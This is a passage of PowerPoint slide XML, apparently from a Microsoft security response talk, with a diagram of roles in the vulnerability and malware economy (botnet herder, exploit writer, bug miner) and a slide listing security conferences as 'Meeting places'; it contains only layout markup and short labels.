            <a:outerShdw blurRad="254000" dist="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cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61" name="TextBox 60"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5882004" y="3336877"/>
            <a:ext cx="1095172" cy="590931"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:scene3d>
            <a:camera prst="orthographicFront"/>
            <a:lightRig rig="threePt" dir="t"/>
          </a:scene3d>
          <a:sp3d>
            <a:bevelT prst="angle"/>
          </a:sp3d>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Software</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Vendor</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="Oval 62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8047038" y="3205163"/>
            <a:ext cx="842962" cy="827087"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="000000"/>
              </a:gs>
              <a:gs pos="39999">
                <a:srgbClr val="0A128C"/>
              </a:gs>
              <a:gs pos="70000">
                <a:srgbClr val="181CC7"/>
              </a:gs>
              <a:gs pos="88000">
                <a:srgbClr val="7005D4"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="8C3D91"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
            <a:tileRect r="-100000" b="-100000"/>
          </a:gradFill>
          <a:ln w="50800">
            <a:solidFill>
              <a:schemeClr val="bg2">
                <a:lumMod val="40000"/>
                <a:lumOff val="60000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="254000" dist="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cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33812" name="TextBox 63"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8043863" y="3302000"/>
            <a:ext cx="889000" cy="590550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Botnet</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Herder</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65" name="Oval 64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6034088" y="1187450"/>
            <a:ext cx="842962" cy="828675"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="000000"/>
              </a:gs>
              <a:gs pos="39999">
                <a:srgbClr val="0A128C"/>
              </a:gs>
              <a:gs pos="70000">
                <a:srgbClr val="181CC7"/>
              </a:gs>
              <a:gs pos="88000">
                <a:srgbClr val="7005D4"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="8C3D91"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
            <a:tileRect r="-100000" b="-100000"/>
          </a:gradFill>
          <a:ln w="50800">
            <a:solidFill>
              <a:schemeClr val="bg2">
                <a:lumMod val="40000"/>
                <a:lumOff val="60000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="254000" dist="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cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33814" name="TextBox 65"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5953125" y="1325563"/>
            <a:ext cx="1108075" cy="592137"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Reverse</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Engineer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67" name="Oval 66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6162675" y="5118100"/>
            <a:ext cx="841375" cy="828675"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="000000"/>
              </a:gs>
              <a:gs pos="39999">
                <a:srgbClr val="0A128C"/>
              </a:gs>
              <a:gs pos="70000">
                <a:srgbClr val="181CC7"/>
              </a:gs>
              <a:gs pos="88000">
                <a:srgbClr val="7005D4"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="8C3D91"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
            <a:tileRect r="-100000" b="-100000"/>
          </a:gradFill>
          <a:ln w="50800">
            <a:solidFill>
              <a:schemeClr val="bg2">
                <a:lumMod val="40000"/>
                <a:lumOff val="60000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="254000" dist="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cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33816" name="TextBox 67"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6043613" y="5254625"/>
            <a:ext cx="1085850" cy="590550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Payload</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Coder</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69" name="Oval 68"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3992563" y="3278188"/>
            <a:ext cx="841375" cy="827087"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="000000"/>
              </a:gs>
              <a:gs pos="39999">
                <a:srgbClr val="0A128C"/>
              </a:gs>
              <a:gs pos="70000">
                <a:srgbClr val="181CC7"/>
              </a:gs>
              <a:gs pos="88000">
                <a:srgbClr val="7005D4"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="8C3D91"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
            <a:tileRect r="-100000" b="-100000"/>
          </a:gradFill>
          <a:ln w="50800">
            <a:solidFill>
              <a:schemeClr val="bg2">
                <a:lumMod val="40000"/>
                <a:lumOff val="60000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="254000" dist="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cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33818" name="TextBox 69"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4010025" y="3375025"/>
            <a:ext cx="1027113" cy="590550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>POC</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Coder</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71" name="Oval 70"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7545388" y="4475163"/>
            <a:ext cx="841375" cy="828675"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="000000"/>
              </a:gs>
              <a:gs pos="39999">
                <a:srgbClr val="0A128C"/>
              </a:gs>
              <a:gs pos="70000">
                <a:srgbClr val="181CC7"/>
              </a:gs>
              <a:gs pos="88000">
                <a:srgbClr val="7005D4"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="8C3D91"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
            <a:tileRect r="-100000" b="-100000"/>
          </a:gradFill>
          <a:ln w="50800">
            <a:solidFill>
              <a:schemeClr val="bg2">
                <a:lumMod val="40000"/>
                <a:lumOff val="60000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="254000" dist="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cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33820" name="TextBox 71"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7426325" y="4613275"/>
            <a:ext cx="1057275" cy="590550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Malware</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Coder</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73" name="Oval 72"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7573963" y="1858963"/>
            <a:ext cx="841375" cy="828675"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="000000"/>
              </a:gs>
              <a:gs pos="39999">
                <a:srgbClr val="0A128C"/>
              </a:gs>
              <a:gs pos="70000">
                <a:srgbClr val="181CC7"/>
              </a:gs>
              <a:gs pos="88000">
                <a:srgbClr val="7005D4"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="8C3D91"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
            <a:tileRect r="-100000" b="-100000"/>
          </a:gradFill>
          <a:ln w="50800">
            <a:solidFill>
              <a:schemeClr val="bg2">
                <a:lumMod val="40000"/>
                <a:lumOff val="60000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="152400" dist="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cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33822" name="TextBox 73"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7540625" y="1970088"/>
            <a:ext cx="1066800" cy="590550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>IDS/AV</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Expert</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75" name="Oval 74"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4511675" y="1846263"/>
            <a:ext cx="842963" cy="827087"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="000000"/>
              </a:gs>
              <a:gs pos="39999">
                <a:srgbClr val="0A128C"/>
              </a:gs>
              <a:gs pos="70000">
                <a:srgbClr val="181CC7"/>
              </a:gs>
              <a:gs pos="88000">
                <a:srgbClr val="7005D4"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="8C3D91"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
            <a:tileRect r="-100000" b="-100000"/>
          </a:gradFill>
          <a:ln w="50800">
            <a:solidFill>
              <a:schemeClr val="bg2">
                <a:lumMod val="40000"/>
                <a:lumOff val="60000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="254000" dist="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cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33824" name="TextBox 75"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4565650" y="1901825"/>
            <a:ext cx="1057275" cy="647700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Bug</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Miner</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77" name="Oval 76"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4756150" y="4603750"/>
            <a:ext cx="842963" cy="828675"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="000000"/>
              </a:gs>
              <a:gs pos="39999">
                <a:srgbClr val="0A128C"/>
              </a:gs>
              <a:gs pos="70000">
                <a:srgbClr val="181CC7"/>
              </a:gs>
              <a:gs pos="88000">
                <a:srgbClr val="7005D4"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="8C3D91"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
            <a:tileRect r="-100000" b="-100000"/>
          </a:gradFill>
          <a:ln w="50800">
            <a:solidFill>
              <a:schemeClr val="bg2">
                <a:lumMod val="40000"/>
                <a:lumOff val="60000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="254000" dist="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cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33826" name="TextBox 77"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4711700" y="4713288"/>
            <a:ext cx="1057275" cy="590550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Exploit</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Writer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33827" name="Rectangle 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="246063" y="1122363"/>
            <a:ext cx="3794125" cy="5264150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>Actors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>Understand decision making process - Engage all segments </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>Technology</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>Identify attack &amp; research trends - Extinguish classes of issues</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>Economics</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>Promote legitimate business opportunities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>Increase the cost of illegal activities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr smtClean="0"/>
              <a:t>MSRC Activities</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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Picture 15" descr="lg.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="330200" y="4349750"/>
            <a:ext cx="4340225" cy="825500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="372035" y="310870"/>
            <a:ext cx="8382000" cy="664797"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr smtClean="0"/>
              <a:t>Meeting places</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="34820" name="Picture 4" descr="http://www.taosecurity.com/images/blackhat.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="377825" y="1225550"/>
            <a:ext cx="3324225" cy="676275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="34821" name="Picture 6" descr="http://tbn0.google.com/images?q=tbn:6GwiTk3wRVfBhM:http://fond-gouv.qc.ca/103/images/syscan.jpg">
            <a:hlinkClick r:id="rId5"/>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="322263" y="3189288"/>
            <a:ext cx="3332162" cy="887412"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="34822" name="Picture 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4776788" y="1041400"/>
            <a:ext cx="4070350" cy="1582738"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="34823" name="Picture 9" descr="http://ph-neutral.darklab.org/0x7d4/img/ph-neutral_logo.gif"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5854700" y="2749550"/>
            <a:ext cx="2725738" cy="1533525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="34824" name="Picture 15" descr="http://xcon.xfocus.org/images/xcon2007.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="630238" y="5267325"/>
            <a:ext cx="8001000" cy="1000125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="34825" name="Picture 13" descr="BACon.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
